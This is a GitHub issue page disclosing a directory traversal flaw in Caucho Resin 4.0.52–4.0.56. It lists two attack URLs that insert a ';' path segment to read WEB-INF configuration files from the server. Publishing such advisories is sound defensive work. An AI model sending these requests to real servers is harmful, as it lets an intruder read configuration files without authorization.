Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Directory traversal vulnerability in Caucho Resin #2

Open
maybe-why-not opened this issue Apr 4, 2022 · 0 comments
Open

Directory traversal vulnerability in Caucho Resin #2

maybe-why-not opened this issue Apr 4, 2022 · 0 comments

Comments

@maybe-why-not
Copy link
Owner

Directory traversal vulnerability in Caucho Resin, as distributed in Resin V4.0.52~4.0.56, allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.

[Attack Vectors]
http://localhost/resin-doc/;/WEB-INF/resin-web.xml
http://localhost/webapp-name/;/WEB-INF/web.xml
Fopjpqn6Y-U-s3MbAlwME7npo6Sa

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant